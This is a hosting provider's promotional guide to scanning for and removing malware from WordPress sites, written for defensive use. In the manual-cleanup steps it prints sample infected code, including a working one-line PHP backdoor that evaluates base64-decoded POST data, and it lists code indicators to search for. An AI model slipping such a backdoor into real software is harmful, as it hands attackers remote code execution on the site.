Due to its popularity, WordPress is a regular target for cyberattacks. Research suggests that around 4.7 million WordPress sites are hacked annually.
In March 2024, over 3,000 WordPress websites using the popular Popup Builder plugin were compromised. The vulnerability tracked as CVE-2023-6000 was exploited to redirect users to malicious websites.
Alarming right?
In this article, we’ll discuss the importance of detecting and removing malware and guide you through multiple easy methods of scanning and removing malware from a WordPress site.
Let’s get started!
Why Malware Detection and Removal Is Crucial?
Despite robust security measures, WordPress sites are still susceptible to various forms of malware, such as viruses, worms, Trojan horses, or spyware. Malware often infiltrates sites through malicious plugins or themes.
For example, in February 2024, over 25,000 websites using the Bricks theme were vulnerable to attack due to a critical remote code execution (RCE) flaw, CVE-2024-25600. This bug, with a severity rating of 9.8 out of 10, allowed attackers to take over websites without user credentials.
In addition, vulnerabilities in the core WordPress or server software can also serve as entry points.
Once infected, attackers can cause serious damage, deleting files, injecting spam links, and stealing sensitive information like passwords and credit card numbers. This can lead to downtime and a loss of customer trust, severely impacting business.
Given these risks, understanding and implementing malware detection and removal is essential.
With that said, let’s look at how you can detect if your WordPress site has been compromised.
Protect Your Site with Cloudways Malware Protection
Shield your applications from vulnerabilities. Run real-time scans, scheduled scans, and automated cleanup to secure your site from malware.
How to Check for Malware on Your WordPress Site?
The longer malware stays on your site, the more damage it can cause and potentially spread to other websites. If not addressed quickly, your WordPress hosting service might suspend your account, and search engines like Google could blacklist your site.
There are several ways to scan a WordPress site for malware. Below, we’ll explore the most popular methods for detecting WordPress malware.
Option #1: Scan for Malware via a Plugin
There are multiple WordPress Anti-Malware plugins available that you can use to scan your site for malware.
For example, Wordfence Security is a popular free plugin that can scan for malicious code, backdoors, and shells that hackers may have installed. However, the free version does have some limitations.
Install and Activate it like any other WordPress plugin. Then, go to its settings and click the Start New Scan button.
Once the scan is complete, Wordfence will display the results, notifying you of any suspicious code, infections, malware, or corrupted files on your website. It will also recommend actions to fix these issues.
When I ran the scan, it found multiple critical errors on my site. To address these errors, I clicked the Repair All Repairable Files button.
That said, the safety of third-party WordPress plugins varies based on the developer’s reputation, code quality, and maintenance. While many plugins are safe and useful, it’s important to exercise caution when selecting and using them.
Option #2: Scan for Malware Using Online Tools
You can also use online malware scanners to check your website for hacks. For instance, IsItWP’s Malware Scanner, powered by Sucuri, is a good option.
That said, it’s important to remember that online scanners can only check publicly visible files. If the malware is hidden in other files, these scanners may not detect it.
You can also check Google’s Transparency Report to see if your website has been blacklisted.
Another option is to use Google Search Console, which regularly scans your website for problems.
Option #3: Scan for Malware Infections Manually
Another option is manually scanning your website for malware, but it’s best left to security experts due to its complexity and stealth.
However, if you need to proceed, look for recently modified files using an FTP client like FileZilla. Check for any unusual file modifications, as this could indicate malware.
Additionally, verify the integrity of your WordPress core files by downloading the same version from WordPress.org and comparing them with your site’s files. Any discrepancies could be a sign of malware.
This approach is way more time-consuming than a plugin or a dedicated malware detection tool.
Option #4: Scan for Malware on Cloudways
If you’re a Cloudways customer and want to keep your site safe from malware, you can leverage our Malware Protection add-on powered by Imunify360.
Our add-on sits above the application layer and helps automatically remove detected malware—you don’t have to manually run scans. It starts at just $4/app per month.
It also comes with RASP (Runtime Active Self Protection), which helps detect and eliminate threats at runtime by scanning files whenever changes are made. This eliminates malicious code before it can damage your apps.
How to Remove Malware from WordPress Site?
There are multiple methods to remove malware from a WordPress site. For this blog, we’ll look at three different methods:
Method #1: Remove Malware from WordPress Manually
Note: Manual malware removal from a WordPress site is not recommended unless you are a security expert, as accidentally deleting a crucial file could break your entire site.
💡 It’s highly recommended that you activate the Malware Protection Add-on if you’re a Cloudways customer or use a malware removal plugin.
However, if you’d like to go with a manual cleanup, here’s a step-by-step guide to help you through the process.
Step #1: Back up Your Website
First, make sure you have a backup of your WordPress site. This way, if anything breaks while you’re cleaning things up, you can easily fix it.
If you’re a Cloudways customer, backing up your application is easy. To take an on-demand manual backup,
From the main dashboard Cloudways, open Servers and choose your target server. Then, click on Backup → Take Backup Now.
You can also use plugins to take backups. The WordPress plugin repository offers many options, including UpdraftPlus, BlogVault, BackWPup, and Solid Backups.
Step#2: Download Fresh Copies of WordPress Core, Themes, and Plugins
Download fresh files from the WordPress repository. Make sure to download the same versions that are installed on your site. For example, download the WordPress Core from the official website.
Similarly, download fresh versions of themes and plugins. This will help you identify and replace infected files with clean ones.
Step#3: Reinstall WordPress Core Files
In the previous step, we downloaded a clean version of WordPress. You can now use the clean version to replace the core WordPress files and remove malware from your WordPress site.
To do this, access your site files through cPanel or SFTP and replace the wp-admin and wp-includes folders. These folders do not contain user content and can be safely replaced.
After this, inspect the following files for any signs of malware:
- index.php
- wp-settings.php
- wp-load.php
- wp-config.php
- .htaccess
Since there isn’t a single type of malware to look for, you need to ensure any suspicious code is indeed malware before removing it. For example, if you come across code like this:
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBleGFtcGxlX2Z1bmN0aW9uKCk7fQ=='));
It’s likely malicious and should be deleted. Additionally, check the wp-uploads folder. If you find any PHP files there, delete them immediately, as this folder is not intended to contain PHP files.
Step#4: Clean and Replace Theme and Plugin Files
Identify any suspicious or recently modified theme and plugin files. Use clean copies of these files and compare them to those on your site. Replace any files that contain malicious code.
Theme and plugin files are located in the wp-content folder. Carefully review each file, comparing them to fresh versions to identify suspicious code.
Here’s an example comparison between a clean plugin file and one that has been compromised with malware:
Clean Plugin File:
<?php /** * Plugin Name: Example Plugin * Description: This is a clean example plugin. * Version: 1.0 * Author: Plugin Author */ // Your plugin code here function example_plugin_function() { echo "This is a clean plugin function."; } add_action('wp_footer', 'example_plugin_function'); ?>
Compromised Plugin File:
<?php /** * Plugin Name: Example Plugin * Description: This is a clean example plugin. * Version: 1.0 * Author: Plugin Author */ // Your plugin code here function example_plugin_function() { echo "This is a clean plugin function."; } add_action('wp_footer', 'example_plugin_function'); // Malicious code added if (file_exists('malicious_file.php')) { include('malicious_file.php'); } eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBleGFtcGxlX2Z1bmN0aW9uKCk7fQ==')); ?>
Step#5: Purge Malware from the Database
Remove malware from the database. Use your database admin panel to search for suspicious content, focusing on the wp_options and wp_posts tables.
When you find a table with suspicious content, open it and manually delete the unwanted entries. For example, if you see something like this in the wp_options table:
option_id | option_name | option_value | autoload |
1 | siteurl | http://yourwebsite.com | yes |
2 | home | http://yourwebsite.com | yes |
3 | malicious_option | aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBleGFtcGxlX2Z1bmN0aW9uKCk7fQ== | yes |
Delete the malicious_option entry.
After cleaning, test your website to ensure it’s still functional and everything works properly.
Step#6: Patch Vulnerabilities
By now, you’ve successfully removed malware from your WordPress site. To safeguard your WordPress site from future attacks, you must patch vulnerabilities that hackers could exploit.
These vulnerabilities, often hidden within your website’s code, allow hackers to inject malware and gain access to your site.
To find and remove these gaps, search your code for common indicators like eval, preg_replace, str_replace, base64_decode, and gzinflate. Or for less common ones like wp-content.old.tmp.
If you find any suspicious usage, delete it.
For example, if you encounter code like this:
if (isset($_POST['data'])) { eval(base64_decode($_POST['data']));}
This is a typical backdoor method that should be removed immediately.
Step#7: Reupload Cleaned Files
After completing your clean-up, the next step is to reupload the cleaned files to your website. This process is similar to manually restoring a backup, and you can use cPanel or SFTP to do this.
Start by deleting the files and tables that you intend to replace.
For example, if you have cleaned versions of index.php and wp-config.php, delete the existing versions of these files from your server. Then, upload the cleaned versions of index.php and wp-config.php to their respective locations.
Step#8: Clear the Cache
Clearing the cache eliminates any cached versions of your site that might still contain remnants of malware, ensuring your site is thoroughly clean.
Step#9: Change All Passwords and Access Keys
Hackers often use malware to launch brute-force attacks on administrator accounts. Changing your passwords can help slow them down and protect your WordPress site. Use strong, unique passwords for each account.
The following account accesses and credentials should be updated as soon as possible:
- Hosting account
- FTP accounts
- wp-admin credentials
- WP Salts
- SSH accounts
Step #10: Disable Themes or Plugins
To check if your themes or plugins contain malware, turn them off one by one and see if your website works normally. This helps identify infected ones.
At the same time, make sure to use a reliable malware scanner to check your website thoroughly. This scan confirms that all traces of malware have been removed.
If you’re a Cloudways customer, consider getting the Malware Protection add-on. While you can also use plugins or other tools to remove malware, you risk leaving backdoors open.
Secure Your Site With Cloudways WordPress Hosting
Our advanced WordPress hosting offers free 1-click SSL, DDoS mitigation, Malware Protection, Cloudflare Enterprise & more to keep your website safe.
Method #2: Remove Malware from WordPress via a Plugin
Previously, we mentioned using Wordfence to scan for malware. Now, let’s review how to remove malware using the Wordfence Security plugin.
Initial Scan
Navigate to the Wordfence Scan menu and click Start Scan. This will initiate an initial scan and present you with various results.
Each result will provide details on what Wordfence found and guide you through resolving the issues.
Deep Scan
Once the initial scan is complete and you’ve addressed the issues, perform a deeper scan. Go to the All Options menu on the left.
Scroll down to the Basic Scan Type Options section and check the box for High Sensitivity. This deeper scan takes longer but can detect more stubborn malware.
Custom Scans
For additional scans, use the All Options page to customize your Wordfence scan according to your needs.
Review Results
Carefully review the files identified as potentially containing malware. If you see anything suspicious, try to remove the harmful code without deleting the entire file. Remember, you can always restore from a backup if needed.
Check Core, Theme, and Plugin Files
Review any changes in core, theme, and plugin files. Wordfence provides options to compare these files with their original versions. Use the Wordfence option to repair the files if you find malicious changes.
Final Scan
Work through the list until it is empty, then run another scan to confirm your site is clean. But as we mentioned earlier, using malware protection plugins might not be the safest option.
Method #3: Remove Malware via Cloudways Malware Protection Add-on
Malware Protection Add-on powered by Imunify360 automatically identifies and removes malicious code from your application’s files and database. It offers protection through real-time scans, scheduled scans, and automated cleanup.
Benefits of Cloudways Malware Protection Add-on
- Identify and block phishing attacks in real time.
- Shield your system from all types of malicious attacks.
- Automatically clean up infected fields in the database.
- Clean up infected files automatically.
- Block malware injection in real-time.
- Perform on-demand scans of your applications as needed.
- Automated malware protection detects and cleans malware seamlessly.
How to Enable and Use the Malware Protection Add-on
- Go to App Management for your selected app.
- Find the Malware Protection menu.
- Click on Enable Protection.
Once the add-on is activated, it will automatically remove any detected malware from your applications, which can be viewed under the Malicious tab.
Additionally, you can:
- Access the Scan History section to review the timing and results of past scans.
- In the Proactive Defence section, view malicious events that were detected and eliminated in real-time.
- If needed, select a file and click the restore button to recover a cleaned file.
When comparing our add-on with Method #1 and Method #2, it’s clear that our WordPress malware removal option is both more streamlined and secure.
Most WordPress malware scanners, which operate as plugins, have inherent flaws. They function within the same server environment as the WordPress site and the malware, making them susceptible to manipulation or disabling.
In contrast, Cloudways’ malware protection add-on operates at the server level, outside the application layer. This ensures better detection, protection, and reliability.
How to Remove Malware Warnings from Google?
If Google spots malware on your site, it puts up a warning to keep users safe. But this also scares potential visitors and can hurt your website’s reputation. Plus, other search engines and web hosts might blacklist your site too.
To solve this problem, you can ask Google for a review. But first, ensure your website is completely free of malware.
Follow these steps to take your site off Google’s blacklist:
- Check your website thoroughly for any malware.
- Log in to your Google Search Console account.
- Go to the Security Issues section and scroll down.
- Click on Request a review.
- Fill in the form detailing the steps you took to fix the problems.
- Submit your request.
Please be patient. Google needs a few days to review your request. Avoid repeatedly checking or asking about it, as this could worsen things.
Summary
Keeping your WordPress site safe from malware is crucial to protect your data, reputation, and visitor experience.
By following the steps in this guide, you’ll be well-equipped to identify and remove malware threats. Remember, taking proactive measures like regular scans and backups is the best defense.
If you’re a Cloudways user, the Malware Protection add-on (for just $4/app/month) provides an extra layer of security and convenience.
Q1. Why does my WordPress site keep getting infected?
Outdated software is like an open door for malware! Regular updates for WordPress, plugins, themes, and anything else installed to keep those doors shut.
If keeping up with scans feels overwhelming, consider the Cloudways Malware Protection add-on. It automatically removes malware, making life easier.
Q2. How to remove malware from WordPress?
- Back up your site (most important!)
- Download fresh WordPress files.
- Replace infected core files.
- Clean up code and database entries.
- Patch vulnerabilities.
- Re-upload cleaned files.
- Change all passwords.
Abdul Rehman
Abdul is a tech-savvy, coffee-fueled, and creatively driven marketer who loves keeping up with the latest software updates and tech gadgets. He's also a skilled technical writer who can explain complex concepts simply for a broad audience. Abdul enjoys sharing his knowledge of the Cloud industry through user manuals, documentation, and blog posts.